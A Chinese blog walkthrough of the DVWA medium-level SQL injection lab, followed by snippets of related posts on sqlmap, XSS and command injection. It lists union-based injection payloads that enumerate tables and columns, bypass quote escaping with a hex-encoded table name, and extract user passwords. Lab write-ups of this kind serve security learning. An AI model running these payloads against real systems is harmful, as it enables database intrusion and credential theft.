dvwa闯关——medium级SQL

zbcaicai

2020-01-05

关注关注

medium级的sql不让用户输入，可以通过burpsuite抓包绕过

一、判断是否有注入点，注入类型、字段数等

1.是否有注入即注入类型

dvwa闯关——medium级SQL

修改为id=1 and 1=1后，如下图：

　　 dvwa闯关——medium级SQL

　　存在注入点为数字型

2.判断字段数

1 order by 2时：

dvwa闯关——medium级SQL

　　1 order by 3时：

　　 dvwa闯关——medium级SQL

　　所以字段数为2

3.确定回显位置

　　 dvwa闯关——medium级SQL

　　4.查询数据库及版本

dvwa闯关——medium级SQL

　　5.获取数据库中所有表

1 union select 1,table_name from information_schema.tables where table_schema=database()

dvwa闯关——medium级SQL

　　该数据库有两张表

dvwa闯关——medium级SQL

　　6.获取列名

单引号被转义了，所以不能用table_name=‘users‘获取数据，用十六进制绕过

1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

dvwa闯关——medium级SQL

列名

dvwa闯关——medium级SQL

　　7.获取用户和密码

1 union select user,password form users

dvwa闯关——medium级SQL

用户和密码

dvwa闯关——medium级SQL

dvwa sql注入

zbcaicai

0 关注 0 粉丝 0 动态

关注关注

DVWA靶机-sql自动注入

打开sql漏洞，发现输入不同的数字会返回不同的信息，前面一个单引号闭合了查询语句自带的第一个单引号，or 1=1 使得结果永远为真，sqlmap需要python环境才能运行。这里先别急着粘贴url，因为登陆dvwa靶机需要用户名和密码，所以会有cookie

gwn00 2020-02-01

Docker学习日记

简介：Docker 是一个开源的应用容器引擎，基于 Go 语言并遵从 Apache2.0 协议开源。Docker 可以让开发者打包他们的应用以及依赖包到一个轻量级、可移植的容器中，然后发布到任何流行的 Linux 机器上，也可以实现虚拟化。容器是完全使用

spylyt 2020-06-14

DVWA+SQLMAP

最近在做一个DVWA本地***测试的一个演练，其中遇到的一些问题做一个记录。附上sqlmap执行语句。

tanrong 2020-06-03

Windows上DVWA和sqli-labs部署

注意:sqli-labs与php5版本适应较好，但是最新版的phpstudy中默认php是php7版本，所以在phpstudy中要下载php5，并把网站的php版本换成php5,仍用php7会出现很多语法错误。sqli-labs可以再github上下载，如

amberom 2020-05-12

搭建靶场环境

快速搭建环境，我认为用docker是一个比较好的选择，快速、简单、占用资源较少。选一个合适的就可以使用，eg：nfoslack/dvwa. docker run -d -p 80:80 -p 3306:3306 -e MYSQL_PASS="my

flyDeDog 2020-05-02

dvwa全等级命令行注入

在低等级的命令行注入没有任何的过滤，通过查看源码可以得知，所以又被称为短路运算符。也就是说命令b的执行不会受到命令a的干扰，在执行效率上来说“&&”更加高效。

84251449 2020-01-16

DVWA-从入门到放弃之XSS(Reflected,Stored,DOM)

XSS-跨站脚本攻击，在某种意义上也是一种注入型攻击XSS不仅仅限于JavaScript，还包括flash等其它脚本语言根据恶意代码是否存储在服务器中，XSS可以分为存储型的XSS与反射型的XSSDOM型的XSS由于其特殊性，是一种基于DOM树的XSS，被

adeyi 2019-11-17

Nmap、Sqlmap等工具使用

-u 指定注入点url-r 指定request？--dbs 暴库--tables 列出表--columns 列出字段--dump 下载数据--beach 程序自动输入询问语句的[Y/N]--current-db web当前使用的数据库--start 指定开

YFCEMBEDD 2019-11-09

（九）DVWA之SQL Injection--SQLMap&Fiddler测试（High）

$page[ ‘title‘ ] = ‘SQL Injection Session Input‘ . $page[ ‘title_separator‘ ].$page[ ‘title‘ ];$_SESSION[ ‘id‘ ] = $_POST[ ‘id‘

fshwalwal 2019-10-28

dvwa下利用xss获取cookie并利用

首先呢，需要先有一个dvwa的靶场，我这里是在本地搭建了一个，先访问127.0.0.1，正常用户名密码登录。确定可以使用代码之后，在搭建的服务器目录下创建一个cookie.php，我这里是C:\wamp\www. 目的是为了将获取到的cookie，保存到c

xiaof 2019-10-28

win10 DVWA下载安装配置图文教程详解（新手学渗透）

　　电脑重装系统了，需要重新装一下渗透测试的学习环境DVWA，借此机会就跟大家讲一下DVWA的安装过程，因为不同的电脑配置、环境不同，在我的电脑上按照我这个安装教程是一次性就安装好了的。安装过程总共分两步，phpstudy的下载以及dvwa的下载。

fincakkk 2019-04-28

Kali Linux 2016.2(Rolling) 搭建 DVWA

DVWA DVWA 是用 PHP + Mysql 编写的一套用于常规 WEB 漏洞教学和检测的WEB脆弱性测试程序。包含了 SQL 注入、 XSS 、盲注等常见的一些安全漏洞。Kali 已自带了平台所需的环境，所以搭建非常简单。配置环境开启 MySQLs

zhaojp0 2019-06-21

dvwa_low_SQL_Injection

安装wamp服务，wamp是集成apache+mysql+php的环境。先假装自己是好人，输入1或者2或者3等。1’ union select 1,group_concat from information _schema.tables where tab

前端外刊评论 2018-05-20

DVWA SQL-injection 附python脚本

接下来检测是否存在注入，分别输入 1' and 1=1 1' and 1=2 当我们输入1' and 1=1时，发现报错页面，提示我们语句没有闭合，所以我们输入1' and '1'='1和 1' and '1'='2. 1' order by 3# 报错

数据分析侠 2018-01-05

DVWA安装，ALMP环境搭建以及php版本转换

前言本文记录DVWA在虚拟机中安装配置，包括ALMP环境的搭建和php版本的转换。一. DVWA安装配置1. 搭建虚拟机，设置虚拟机网络为桥接模式，可用ifconfig -a,产看虚拟机ip。在浏览器里输入http://localhost或者是http:/

编程爱好者联盟 2016-12-23

安科网

dvwa闯关——medium级SQL

zbcaicai

zbcaicai

相关推荐

DVWA靶机-sql自动注入

Docker学习日记

DVWA+SQLMAP

Windows上DVWA和sqli-labs部署

搭建靶场环境

dvwa全等级命令行注入

DVWA-从入门到放弃之XSS(Reflected,Stored,DOM)

Nmap、Sqlmap等工具使用

（九）DVWA之SQL Injection--SQLMap&Fiddler测试（High）

dvwa下利用xss获取cookie并利用

win10 DVWA下载安装配置图文教程详解（新手学渗透）

Kali Linux 2016.2(Rolling) 搭建 DVWA

dvwa_low_SQL_Injection

DVWA SQL-injection 附python脚本

DVWA安装，ALMP环境搭建以及php版本转换

zbcaicai